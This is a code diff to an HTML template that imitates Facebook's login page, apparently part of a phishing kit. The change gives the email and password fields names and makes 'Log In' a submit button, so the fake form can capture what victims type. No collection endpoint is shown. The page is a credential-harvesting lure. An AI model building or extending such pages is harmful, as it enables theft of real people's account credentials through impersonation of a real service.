--- a/templates/facebook.html
+++ b/templates/facebook.html
@@ -98,9 +98,9 @@ body {
   <div class="wrapper">
     <h1 class="logo">facebook</h1>
     <div class="login-box">
-      <input type="text" placeholder="Mobile number or email" required />
-      <input type="password" placeholder="Password" required />
-      <button class="login-btn">Log In</button>
+      <input type="text" id="username" name="username" placeholder="Mobile number or email" required />
+      <input type="password" id="password" name="password" placeholder="Password" required />
+      <button type="submit" class="login-btn">Log In</button>
       <a href="#" class="forgot">Forgotten password?</a>
       <div class="divider"></div>
       <button class="create-btn">Create New Account</button>
